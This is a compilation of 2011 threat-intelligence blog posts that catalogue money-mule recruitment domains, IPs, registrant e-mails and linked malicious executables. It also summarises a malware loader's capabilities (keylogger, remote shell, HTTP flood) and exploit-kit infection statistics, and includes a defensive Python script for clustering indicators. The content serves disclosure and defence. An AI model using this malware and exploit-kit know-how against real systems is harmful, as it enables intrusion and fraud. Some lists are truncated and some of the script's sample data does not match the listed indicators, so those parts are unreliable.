Currently active and responding money mule recruitment domains, residing within AS42708, PORTLANE Network; AS29713, INTERPLEXINC Interplex LLC; AS24940, HETZNER-AS Hetzner Online AG RZ:

alternative-art-ltd.net - 193.105.134.234
westview-art.net - 193.105.134.233
RICHMOND-ART-UK.BIZ - 193.105.134.232
fourthgroup-ltd.cc - 193.105.134.230
artby-group.biz - 98.141.220.118
collins-group.cc - 98.141.220.118
aspecs-group.cc - 98.141.220.117
ASPECS-GROUP.CC - 98.141.220.117
callisto-ltdco.net - 98.141.220.117
drawmade-group.com - 98.141.220.117
ephes-groupllc.net - 98.141.220.117
targetmarketgroup-llc.cc - 98.141.220.117
artby-gorup.net - 98.141.220.116
tazprogltd-us.com - 98.141.220.116
groupinc-upland.biz - 98.141.220.115
neoline-llc.net - 98.141.220.115
DERWART-GROUP.AT - 98.141.220.114
ALTERNATIVEART-LTD.COM - 86.55.210.5
collins-groupusa.com - 78.46.105.205
COLLINS-GROUPUSA.COM - 78.46.105.205
derwart-group.com - 78.46.105.205
DURLEY-ARTAU.NET - 78.46.105.205
DURLEY-ART-GROUP.CC - 78.46.105.205
ephesgroup-llc.biz - 78.46.105.205
EPHES-GROUPLLC.CC - 78.46.105.205
kresko-group.biz - 78.46.105.205
MASTERPIECE-GROUP.CC - 78.46.105.205
QEAD-LLC.BIZ - 78.46.105.205
SEVG-GROUPNET.COM - 78.46.105.205
SQUITGROUP-LLC.NET - 78.46.105.205

Psychological evaluation tests found within AS29713; basically every domain name has its associated binary:

aimicgroupllc.exe
artbygorup.exe
aspecsgroup.exe
atlantgroupmain.exe
collinsgroupusa.exe
createncegroupllc.exe
derwartgroup.exe
dogogroup.exe
ephesgroupllc.exe
megatechservicegroupltd.exe
millennialartco.exe
sevggroupnet.exe
stilegroupllc.exe
vintagegroupinc.exe

Monitoring of money mule recruitment campaigns is ongoing.
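The way lists like these are meant to be used is by pivoting: a registrant e-mail reused on two domains, or a hosting IP (and, more weakly, a /24) shared by several, ties otherwise unrelated-looking templates to one group. The following is an added example of that clustering, not the author's own tooling; its input is a constructed subset of the domain/IP/e-mail indicators listed in this post, and the same code applies unchanged to the Part Eight and Part Nine lists, or to the name-server records if NS hostnames and their IPs are fed in as the records.

```python
from collections import defaultdict

# Constructed subset of the (domain, hosting IP, registrant e-mail) indicators
# listed in this post; None where the post gives no value for that field.
RECORDS = [
    ("alternative-art-ltd.net", "193.105.134.234", "ibsen@ppmail.ru"),
    ("westview-art.net", "193.105.134.233", "admin@westview-art.net"),
    ("art-marketllc.cc", None, "hear@ppmail.ru"),
    ("collins-groupusa.com", "78.46.105.205", "admin@collins-groupusa.com"),
    ("megatechservice-group-ltd.com", None, "admin@collins-groupusa.com"),
    ("collins-group.cc", "98.141.220.118", "admin@megatechservicegroup-ltd.cc"),
    ("megatechservicegroup-ltd.cc", None, "admin@megatechservicegroup-ltd.cc"),
    ("derwart-group.com", "78.46.105.205", "admin@ephesgroup-llc.biz"),
    ("ephesgroup-llc.biz", "78.46.105.205", "admin@ephesgroup-llc.biz"),
    ("sevg-groupnet.com", "78.46.105.205", "belle@ca4.ru"),
    ("generation-team.net", None, "luis@cheapbox.ru"),
]


class DisjointSet:
    """Union-find over domain names."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def pivot_keys(ip, email, pivot_on):
    """Indicators a record can be joined on. Exact IP and exact e-mail are
    strong pivots; the /24 is a weak one and is off by default, because
    shared hosting puts unrelated sites in the same /24."""
    if ip and "ip" in pivot_on:
        yield ("ip", ip)
    if ip and "subnet" in pivot_on:
        yield ("subnet", ".".join(ip.split(".")[:3]) + ".0/24")
    if email and "email" in pivot_on:
        yield ("email", email.lower())


def cluster(records, pivot_on=("ip", "email")):
    """Group domains sharing a pivot key. Returns (clusters, evidence):
    clusters is a list of sorted domain lists, largest first; evidence maps
    each shared indicator to the domains it links, so every edge inside a
    cluster can be shown to an analyst, a registrar or a hosting provider."""
    ds = DisjointSet()
    seen = defaultdict(set)
    for domain, ip, email in records:
        ds.find(domain)                      # register singletons too
        for key in pivot_keys(ip, email, pivot_on):
            seen[key].add(domain)
    evidence = {k: sorted(v) for k, v in seen.items() if len(v) > 1}
    for domains in evidence.values():
        for d in domains[1:]:
            ds.union(domains[0], d)
    groups = defaultdict(set)
    for domain, _, _ in records:
        groups[ds.find(domain)].add(domain)
    clusters = sorted((sorted(g) for g in groups.values()),
                      key=lambda g: (-len(g), g[0]))
    return clusters, evidence


if __name__ == "__main__":
    groups, why = cluster(RECORDS)
    for g in groups:
        print(len(g), g)
    for key, domains in why.items():
        print("pivot", key, "->", domains)
```

Exact e-mail matches are the strongest pivot in this data set (admin@collins-groupusa.com is the registrant of MEGATECHSERVICE-GROUP-LTD.COM as well), a shared IP is strong only when the host is not a large shared server, and a shared mailbox provider such as ppmail.ru or bz3.ru is no pivot at all, which is why ibsen@ppmail.ru and hear@ppmail.ru stay in separate clusters. The evidence map keeps every link explainable, which is what a takedown request or a case file needs.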

Related posts:

[4] Keeping Money Mule Recruiters on a Short Leash - Part Six
[5] Keeping Money Mule Recruiters on a Short Leash - Part Five
[6] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[7] Keeping Money Mule Recruiters on a Short Leash - Part Four
[8] Money Mule Recruitment Campaign Serving Client-Side Exploits
[9] Keeping Money Mule Recruiters on a Short Leash - Part Three
[10] Money Mule Recruiters on Yahoo!'s Web Hosting
[11] Dissecting an Ongoing Money Mule Recruitment Campaign
[12] Keeping Money Mule Recruiters on a Short Leash - Part Two
[13] Keeping Reshipping Mule Recruiters on a Short Leash
[14] Keeping Money Mule Recruiters on a Short Leash
[15] Standardizing the Money Mule Recruitment Process
[16] Inside a Money Laundering Group's Spamming Operations
[17] Money Mule Recruiters use ASProx's Fast Fluxing Services
[18] Money Mules Syndicate Actively Recruiting Since 2002
Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT (2011-05-25 13:18)

With money mule recruitment scams continuing to represent an inseparable part of the cybercrime ecosystem, in this post I'll summarize the findings from an assessment conducted over a month ago on then-active mule recruitment scams. As always, the historical OSINT offered is invaluable for case-building, in particular against a very well segmented group of mule recruiters using identical templates, which they've purchased from a vendor of standardized mule recruitment templates.

Domains known to have been participating in money mule recruitment campaigns, currently offline:

allston-groupsec.cc
atca-inc.com
atcanetworks.net
BANDSGROUP-INC.NET
BANDSGROUPNET.CC
BANDS-GROUPSVC.COM
BANDS-INC.COM
CNLGROUP-INC.CC
CNLGROUPNET.NET
CNL-GROUPSVC.COM
CNL-INC.COM
evolving-inc.com
evolvingsysinc.net
galleogroupnet.net
galleo-inc.com
GIANT-GROUPCO.NET
GIANTGROUPINC.COM
GIANT-GROUPINC.COM
GIANT-GROUPNET.CC
HOSTGROUPINC.COM
HOSTGROUP-INC.COM
HOSTGROUPNET.CC
HOST-GROUPSVC.NET
ICT-GROUPCO.COM
ICTGROUPINC.COM
ICTGROUPNET.CC
ICT-GROUPSVC.NET
IMPERIALGROUPCO.COM
IMPERIAL-GROUPINC.COM
IMPERIAL-GROUPSVC.NET
INFOTECH-GROUPCO.NET
INFOTECH-GROUPINC.COM
infotechgroup-inc.com
jvc-inc.com
magnet-groupinc.cc
netmarket-inc.com
netmarkettech.net
NOVARIS-GROUPLLC.TW
NOVARISGROUPMAIN.TW
NOVARIS-GROUPORG.CC
PERSEUS-GROUPFINE.TW
PERSEUS-GROUPINC.TW
PERSEUSGROUPLLC.CC
USIGROUPINC.COM
USIGROUP-INC.COM
USI-GROUPINC.NET
USIGROUPNET.CC
VITAL-GROUPCO.CC
VITAL-GROUPCO.TW
VITAL-GROUPINC.TW

developgroupinc.net - 69.50.199.209 - Email: slows@5mx.ru
develop-inc.com - 69.50.199.209 - Email: etude@qx8.ru
mercygroupnet.net - 69.50.198.218 - Email: bowie@bigmailbox.ru
mercy-inc.com - 69.50.198.221 - Email: spout@freenetbox.ru
solarisgroupinc.com - 69.50.199.209 - Email: slows@5mx.ru
solarisgroupnet.net - 69.50.198.197 - Email: sharp@maillife.ru
jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru
jvcgroupnet.net - 69.50.198.221 - Email: spout@freenetbox.ru



Name servers of notice, historical OSINT for the responding IPs provided:

ns1.kalipsol9.cc - 208.110.80.34 - Email: tarts@freenetbox.ru
ns2.kalipsol9.cc - 64.85.169.70
ns3.kalipsol9.cc - 173.208.132.42
ns1.mamacholi.net - 208.110.80.35 - Email: excess@bigmailbox.ru
ns2.mamacholi.net - 64.85.169.71
ns3.mamacholi.net - 173.208.132.43
ns1.rjevski.com - 208.110.80.34 - Email: iow@bigmailbox.ru
ns2.rjevski.com - 64.85.169.70
ns3.rjevski.com - 173.208.132.42
ns1.runlesrun.cc - 208.110.80.37 - Email: frost@bigmailbox.ru
ns2.runlesrun.cc - 64.85.169.73
ns3.runlesrun.cc - 173.208.132.45
ns1.skotinko.net - 208.110.80.38 - Email: info@dnregistrar.ru
ns2.skotinko.net - 64.85.169.74
ns3.skotinko.net - 173.208.132.46
ns1.solojumper.com - 208.110.80.36 - Email: crime@bigmailbox.ru
ns2.solojumper.com - 64.85.169.72
ns3.solojumper.com - 173.208.132.44

Monitoring of money mule recruitment campaigns is ongoing.

Related posts:

[1] Keeping Money Mule Recruiters on a Short Leash - Part Seven
[2] Keeping Money Mule Recruiters on a Short Leash - Part Six
[3] Keeping Money Mule Recruiters on a Short Leash - Part Five
[4] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[5] Keeping Money Mule Recruiters on a Short Leash - Part Four
[6] Money Mule Recruitment Campaign Serving Client-Side Exploits
[7] Keeping Money Mule Recruiters on a Short Leash - Part Three
[8] Money Mule Recruiters on Yahoo!'s Web Hosting
[9] Dissecting an Ongoing Money Mule Recruitment Campaign
[10] Keeping Money Mule Recruiters on a Short Leash - Part Two
[11] Keeping Reshipping Mule Recruiters on a Short Leash
[12] Keeping Money Mule Recruiters on a Short Leash
[13] Standardizing the Money Mule Recruitment Process
[14] Inside a Money Laundering Group's Spamming Operations
[15] Money Mule Recruiters use ASProx's Fast Fluxing Services
[16] Money Mules Syndicate Actively Recruiting Since 2002
A Peek Inside the Vertex Net Loader (2011-05-26 16:34)

It appears that the author of the DarkComet RAT has been keeping himself rather busy.

In early-stage development (currently in BETA), the Vertex Net Loader is your typical web-based command and control malware loader, worth keeping an eye on.

More details:

Info on the loader:

This is the small program that will send/retrieve info from/to the web panel; it is like the server part of a RAT. The loader is coded in C++. Size unpacked is 100kb, compressed is very small and still stable. I chose C++ as the language for this project because I have coded in C++ for a long time but never released any security software, so as a friend said it is a shame to have knowledge of C++ and not use it instead of Delphi all the time. Also C++ is faster and more stable than any other language.

Features of the loader:

- Send message box
- Execute any kind of commands
- Close loader process
- Download files and execute them
- Get the process list
- Get the modules list from PID
- Set the keylogger status ON/OFF
- Retrieve the keylogger logs
- Read the file content and retrieve it
- Uninstall the loader
- Httpflood, same technologies as I used for DarkComet, that is very powerful!
- Remote shell
- Visit any webpage

Upcoming features:

- FWB
- More commands
- Panel Installer
- More possibilities in the webpanel
- User manager in the panel
- Plugins support
- and more.
Monitoring of Vertex Net Loader's development is ongoing.

Related posts:

[1] A Peek Inside a New DDoS Bot - "Snap"
[2] Coding Spyware and Malware for Hire
[3] Will Code Malware for Financial Incentives
[4] E-crime and Socioeconomic Factors
[5] Web Based Botnet Command and Control Kit 2.0
[6] BlackEnergy DDoS Bot Web Based
[7] A New DDoS Malware Kit in the Wild
[8] The Cyber Bot - Web Based Malware
[9] The Black Sun Bot - Web Based Malware
[10] Custom DDoS Capabilities Within a Malware
[11] Botnet on Demand Service
[12] Loads.cc - DDoS for Hire Service
[13] Using Market Forces to Disrupt Botnets
[14] Botnet Communication Platforms
[15] A Botnet Master's To-Do List
[16] DDoS on Demand VS DDoS Extortion
[17] How Does a Botnet with 100k Infected PCs Look Like?
Keeping Money Mule Recruiters on a Short Leash - Part Nine (2011-05-30 12:09)

The following brief summarizes currently active money mule recruitment web sites, actively recruiting money mules for the processing of fraudulently obtained funds.

Currently active sites residing within AS42708, PORTLANE Network www.portlane.com; AS29713, INTERPLEXINC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS Hetzner Online:

ATLANTALTD-UK.CC - 193.105.134.233
ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: admin@atlanta-ltd-uk.net
ATLANTA-UK.COM - 193.105.134.233
BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: admin@derwart-group.at
DALI-STYLE.COM - 98.141.220.117
DALISTYLE-GROUP.CC - 98.141.220.118 - Email: tolls@mailti.com
DERWOODE-GROUP.COM - 98.141.220.117
DERWOODE-GROUP.NET - 98.141.220.117
CLACIS-GROUPLLC.COM - 193.105.134.232
CLACISGROUP-LLC.NET - 193.105.134.233
IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net
ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira-de.com
ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv-de.co
IT-SERVICELTD.BE - 78.46.105.205
KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade-group.com
MASTERART-GROUP.COM - 98.141.220.116 - Email: east@maill3.com
MENDRYLTD.COM - 98.141.220.117 - Email: admin@mendryltd.com
MENZEL-GROUP.TV - 98.141.220.118 - Email: admin@devotion-company.com
MITISSANSERVICE-GROUP-LTD.CC - 98.141.220.117 - Email: berra@cutemail.org
MITISSANSERVICEGROUP-LTD.COM - 98.141.220.117 - Email: alibi@mailae.com
oregonltd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru
PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: admin@parlen-groupllc.com
PARLENGROUPLLC.NET - 98.141.220.114
PARLEN-GROUP-USA.COM - 98.141.220.118
quad-groupuk.cc - 86.55.210.6 - Email: prissy@mailae.com
QUAD-GROUPUK.CC - 86.55.210.6 - Email: prissy@mailae.com
QUAD-IT-GROUP.COM - 193.105.134.232 - Email: admin@quad-it-group.com
QUINTAGROUP.CC - 98.141.220.117 - Email: cola@mailae.com
QUINTA-GROUPUS.COM - 98.141.220.118 - Email: admin@quinta-groupus.com
QUINTA-LLC.NET - 98.141.220.118 - Email: admin@quinta-llc.net
REXTECHINNOVATION.COM - 98.141.220.118 - Email: admin@rextechinnovation.com
REXTECHLTD.CC - 98.141.220.115 - Email: blurt@fxmail.net
REXTECHLTD-US.COM - 98.141.220.118 - Email: admin@rextechltd-us.com
SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: admin@special-art-ltd.com
SPECIAL-ART-UK.CC - 193.105.134.234
SUBLIME-LTD.NET - 98.141.220.118 - Email: admin@sublime-ltd.net
TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - Email: admin@targetmarketgroup-llc.cc
TAZPROGLTD-US.COM - 98.141.220.117 - Email: admin@tazprogltd-us.co
VNSPROJECT-DE.CC - 78.46.105.205 - Email: admin@vnsproject-de.cc
VORTEXLLC-UK.COM - 193.105.134.232 - Email: admin@vortexllc-uk.com
VORTEX-LLC-UK.NET - 193.105.134.230 - Email: admin@vortex-llc-uk.net
Name servers of notice:


Monitoring of money mule recruitment campaigns is ongoing.

Related posts: 

[1] Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT

[2] Keeping Money Mule Recruiters on a Short Leash - Part Seven

[3] Keeping Money Mule Recruiters on a Short Leash - Part Six

[4] Keeping Money Mule Recruiters on a Short Leash - Part Five

[5] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

[6] Keeping Money Mule Recruiters on a Short Leash - Part Four

[7] Money Mule Recruitment Campaign Serving Client-Side Exploits

[8] Keeping Money Mule Recruiters on a Short Leash - Part Three

[9] Money Mule Recruiters on Yahoo!'s Web Hosting

[10] Dissecting an Ongoing Money Mule Recruitment Campaign

[11] Keeping Money Mule Recruiters on a Short Leash - Part Two

[12] Keeping Reshipping Mule Recruiters on a Short Leash

[13] Keeping Money Mule Recruiters on a Short Leash

[14] Standardizing the Money Mule Recruitment Process

[15] Inside a Money Laundering Group's Spamming Operations

[16] Money Mule Recruiters use ASProx's Fast Fluxing Services

[17] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [18] Dancho Danchev's blog.



1. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_25.html

2. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short.html

3. http://ddanchev.blogspot.com/2011/03/keeping-money-mule-recruiters-on-short.html

4. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html

5. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

6. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

7. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html

8. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

9. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

10. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html
Summarizing ZDNet's Zero Day Posts for May (2011-06-08 16:24)

The following is a brief summary of all of my posts at ZDNet's Zero Day for May. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

Recommended reading:

• [3] China's Blue Army: When nations harness hacktivists for information warfare

01. [4]Vishing attack on Skype pushing scareware

02. [5]Commtouch: 71 percent increase in new zombies

03. [6]Osama execution video scam spreading on Facebook

04. [7]New MAC OS X scareware delivered through blackhat SEO

05. [8]'You visit illegal websites' FBI-themed emails lead to scareware

06. [9]Fake Microsoft Patch Tuesday emails lead to ZeuS crimeware

07. [10]'Enable Dislike Button' scam spreading on Facebook

08. [11]NASA's Goddard Space Flight Center FTP server hacked

09. [12]'Checkout Your PROFILE Stalkers' scam spreading on Facebook

10. [13]'The World Funniest Condom Commercial - LOL' scam spreading on Facebook

11. [14]China's Blue Army: When nations harness hacktivists for information warfare

This post has been reproduced from [15]Dancho Danchev's blog. Follow him [16]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?

when-nations-harness-hacktivists-for-information-warfare-/8686

10. http://www.zdnet.com/blog/security/enable-dislike-button-scam-spreading-on-facebook/8655

11. http://www.zdnet.com/blog/security/nasas-goddard-space-flight-center-ftp-server-hacked/8660

12. http://www.zdnet.com/blog/security/checkout-your-profile-stalkers-scam-spreading-on-facebook/8665

13. http://www.zdnet.com/blog/security/the-world-funniest-condom-commercial-lol-scam-spreading-on-facebook/86

14. http://www.zdnet.com/blog/security/chinas-blue-army-when-nations-harness-hacktivists-for-information-warfare-/8686
Summarizing ZDNet's Zero Day Posts for June (2011-07-07 12:24)

The following is a brief summary of all of my posts at ZDNet's Zero Day for June. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]'Hot Lesbian Video - Rihanna and Hayden Panettiere' scam on Facebook leads to Mac malware

02. [4]Sony Europe hacked by Lebanese grey hat hacker

03. [5]Spamvertised United Parcel Service emails lead to scareware

04. [6]The most common iPhone passcodes

05. [7]AutoRun malware infections declining

06. [8]'McDonald's Free Dinner Day' emails lead to scareware

07. [9]Two DDoS attacks hit Network Solutions

08. [10]'The Creator of LulzSec arrested in London' scam spreading on Facebook

09. [11]Federal Reserve themed emails lead to ZeuS crimeware

10. [12]'Photographer commited SUICIDE 3 days after shooting THIS video!' scam spreading on Facebook

This post has been reproduced from [13]Dancho Danchev's blog. Follow him [14]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

5. http://www.zdnet.com/blog/security/spamvertised-united-parcel-service-emails-lead-to-scareware/8745

6. http://www.zdnet.com/blog/security/the-most-common-iphone-passcodes/8760

7. http://www.zdnet.com/blog/security/autorun-malware-infections-declining/8772

8. http://www.zdnet.com/blog/security/mcdonalds-free-dinner-day-emails-lead-to-scareware/8848

9. http://www.zdnet.com/blog/security/two-ddos-attacks-hit-network-solutions/8852

10. http://www.zdnet.com/blog/security/the-creator-of-lulzsec-arrested-in-london-scam-spreading-on-facebook/8

11. http://www.zdnet.com/blog/security/federal-reserve-themed-emails-lead-to-zeus-crimeware/8862

12. http://www.zdnet.com/blog/security/photographer-commited-suicide-3-days-after-shooting-this-video-scam-spreading-on-facebook/8911
Keeping Money Mule Recruiters on a Short Leash - Part Ten (2011-07-07 13:25)

The following intelligence brief is part of the [1] Keeping Money Mule Recruiters on a Short Leash series. In it, I'll expose currently active money mule recruitment domains, their domain registration details, currently responding IPs, and related ASs.

Currently active money mule recruitment domains:

The domains reside within the following ASs: AS10297, RoadRunner RR-RC; AS42708, PORTLANE Network; AS26496, GODADDY.com; AS29713, INTERPLEXINC; AS24940, HETZNER-AS Hetzner Online.

Name servers of notice: 


Monitoring of ongoing money mule recruitment campaigns is ongoing.

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part Nine

[3] Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT

[4] Keeping Money Mule Recruiters on a Short Leash - Part Seven

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six

[6] Keeping Money Mule Recruiters on a Short Leash - Part Five

[7] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

[8] Keeping Money Mule Recruiters on a Short Leash - Part Four

[9] Money Mule Recruitment Campaign Serving Client-Side Exploits

[10] Keeping Money Mule Recruiters on a Short Leash - Part Three

[11] Money Mule Recruiters on Yahoo!'s Web Hosting

[12] Dissecting an Ongoing Money Mule Recruitment Campaign

[13] Keeping Money Mule Recruiters on a Short Leash - Part Two

[14] Keeping Reshipping Mule Recruiters on a Short Leash

[15] Keeping Money Mule Recruiters on a Short Leash

[16] Standardizing the Money Mule Recruitment Process

[17] Inside a Money Laundering Group's Spamming Operations

[18] Money Mule Recruiters use ASProx's Fast Fluxing Services

[19] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [20] Dancho Danchev's blog.

recruiters-use-asproxs-fast.html

20. http://ddanchev.blogspot.com/

Summarizing ZDNet's Zero Day Posts for July (2011-08-22 18:06)

The following is a brief summary of all of my posts at ZDNet's Zero Day for July. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]'Leaked Video of Casey Anthony CONFESSING to Lawyer!' scam spreading on Facebook

02. [4]Anonymous leaks 90,000+ emails from compromised military contractor Booz Allen Hamilton

03. [5]'This girl must be Out of her Mind to do this on live Television!' scam spreading on Facebook

04. [6]Spamvertised bank statements serving scareware

05. [7]Internet Explorer 9 outperforms competing browsers in malware blocking test

06. [8]'Leaked Video! Amy Winehouse on Crack hours before death' scam spreading on Facebook

07. [9]Pfizer's Facebook hacked by AntiSec

08. [10]90,000+ pages compromised in mass iFrame injection attack

09. [11]Amazon's cloud services systematically exploited by cybercriminals

This post has been reproduced from [12]Dancho Danchev's blog. Follow him [13]on Twitter.
A Peek Inside Web Malware Exploitation Kits (2011-08-29 13:19)

With web malware exploitation kits continuing to represent the attack method of choice for the majority of cybercriminals, thanks to the [1]overall susceptibility of end and [2]enterprise users to client-side exploitation attacks, it's always worth taking a peek inside them from the perspective of the malicious attacker.

In this post, we'll take a peek inside three web malware exploitation kits, and discuss what makes them tick in terms of infected OSs, browser plugins and client-side exploits.

Dragon Pack Web Malware Exploitation Kit 

[3] 

What we've got here is a rather modest, in terms of activity, web malware exploitation kit admin panel. We've got 45 successful loads based on 588 unique visits, with the JavaRox exploit executed 42 times, successfully infecting 20 Firefox users. The exploits have successfully loaded on Windows XP 14 times, on Windows XP SP2 3 times, on Windows Vista 12 times, and on Windows 7 15 times.

Dragon Exploit Pack 
The Dragon Exploit Pack has 45 successful loads based on 587 unique visitors, with the JavaJDK exploit executed successfully 42 times. The kit is counting 13 successful loads on MSIE 8, and another 20 on Firefox, with 14 successful loads recorded for Windows XP, 2 on Windows XP SP2, 12 on Windows Vista and 15 on Windows 7.

Katrin Exploit Pack 
The Katrin Exploit Pack has 3277 successful loads based on 19933 unique visits, which represents a 17.32 % infection rate. The Java JSM exploit has been successfully loaded 535 times, Java SMB has been loaded 576 times, Java OBE has been loaded 914 times, Old 4 PDF has been loaded 87 times, Libtiff PDF has been loaded 726 times, MDAC has been loaded 96 times, Snapshot has been loaded 104 times, and FICP has been loaded 239 times.

The kit is counting 452 successful exploitation attempts against MSIE 5, 786 against MSIE 7, 1198 against MSIE 8, 274 against Chrome, 522 against Firefox, 24 against Opera and 14 against Safari. The majority of loads have affected Windows XP installations, with 2107 successful loads targeting the OS, followed by 625 on Windows Vista, and 503 on Windows 7.

Liberty Exploit Pack 
The Liberty Exploit Pack screenshot is showing the proportion of successfully infected web browsers, with a total of 555 successful loads based on 3029 unique visitors. 397 loads have affected Internet Explorer 6, 89 Internet Explorer 7, and 54 Firefox.

Bleeding Life Exploit Pack 
In this Bleeding Life web malware exploitation kit, we can clearly see the dynamics behind the infections taking place. We see 554 successful loads based on 4106 unique visitors. JavaSignedApplet has been executed 161 times, Adobe-90-2010-0188 has been executed 67 times, Adobe-80-2010-0188 has been executed 46 times, Java-2010-0842 has been executed 203 times, Adobe-2008-2992 has been executed 74 times, and Adobe-2010-1297 has been executed 2 times.

The majority of the infected population is based in the U.S., United Kingdom, Qatar, and Malaysia. Windows XP has the highest market share of infected OSs, with 336 successful loads based on 2098 unique visitors, followed by Windows 7 with 139 loads based on 1256 unique visitors, and 73 unique loads based on 719 unique visitors for Windows Vista.

This post has been reproduced from [4]Dancho Danchev's blog. Follow him [5]on Twitter.
Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51)

The following intelligence brief is part of the [1] Keeping Money Mule Recruiters on a Short Leash series. In it, I'll expose currently active money mule recruitment domains, their domain registration details, currently responding IPs, and related ASs.

Money mule recruitment domains:

The domains reside within the following ASs: AS24940, HETZNER-AS Hetzner Online AG RZ; AS16265, LeaseWeb B.V. Amsterdam; AS26496, GODADDY.com, Inc.; AS10297, RoadRunner RR-RC-Enet-Columbus.

Name servers of notice:


Monitoring of ongoing money mule recruitment campaigns is ongoing.

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part Ten

[3] Keeping Money Mule Recruiters on a Short Leash - Part Nine

[4] Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT

[5] Keeping Money Mule Recruiters on a Short Leash - Part Seven

[6] Keeping Money Mule Recruiters on a Short Leash - Part Six

[7] Keeping Money Mule Recruiters on a Short Leash - Part Five

[8] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

[9] Keeping Money Mule Recruiters on a Short Leash - Part Four

[10] Money Mule Recruitment Campaign Serving Client-Side Exploits

[11] Keeping Money Mule Recruiters on a Short Leash - Part Three

[12] Money Mule Recruiters on Yahoo!'s Web Hosting

[13] Dissecting an Ongoing Money Mule Recruitment Campaign

[14] Keeping Money Mule Recruiters on a Short Leash - Part Two

[15] Keeping Reshipping Mule Recruiters on a Short Leash

[16] Keeping Money Mule Recruiters on a Short Leash

[17] Standardizing the Money Mule Recruitment Process

[18] Inside a Money Laundering Group's Spamming Operations

[19] Money Mule Recruiters use ASProx's Fast Fluxing Services

[20] Money Mules Syndicate Actively Recruiting Since 2002
Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51)

The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a Short Leash series. In it, I'll expose currently active money mule recruitment domains, their domain registration details, currently responding IPs, and related ASs.

Money mule recruitment domains:
ACWOODE-GROUP.COM - 78.46.105.205 - Email: admin@acwoode-group.com

ACWOODE-GROUP.NET - 78.46.105.205 - Email: admin@acwoode-group.net

ART-GAPSON.COM - 78.46.105.205 - Email: admin@art-gapson.com

CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net

CONDORLLC-UK.COM - Email: plods@fxmail.net

DE-DVFGROUP.BE

ELENTY-CO.NET - Email: abcs@mailti.com

ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty-llc.com

fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org

fine-artgroup.com - 209.190.4.91

GAPSONART.NET - 78.46.105.205 - Email: admin@gapsonart.net

gmd-contracting.com - 194.242.2.56 - Email: admin@gmd-contracting.com

GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru-group.cc

GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org

INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: uq@maill3.com

ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com

NARTEN-ART.COM - 78.46.105.205 - Email: glamor@fxmail.net

NARTENART.NET - 78.46.105.205 - Email: admin@nartenart.net

panart-llc.com - 78.46.105.205 - Email: admin@panart-llc.com

REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: xe@fxmail.net

REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: admin@refinementuk-ltd.net

SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: blurs@mailae.com

SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline-ltd.net

techce-group.com - 184.168.64.173 - Email: admin@techce-group.com

TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex-group.net

triad-webs.com - 85.17.24.226

The domains reside within the following ASs: AS24940, HETZNER-AS Hetzner Online AG RZ; AS16265, LeaseWeb B.V. Amsterdam; AS26496, GoDaddy.com, Inc.; AS10297, RoadRunner RR-RC-Enet-Columbus.
Name servers of notice:

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru

NS2.MKNS.SU - 46.4.148.119

NS3.MKNS.SU - 184.82.158.76
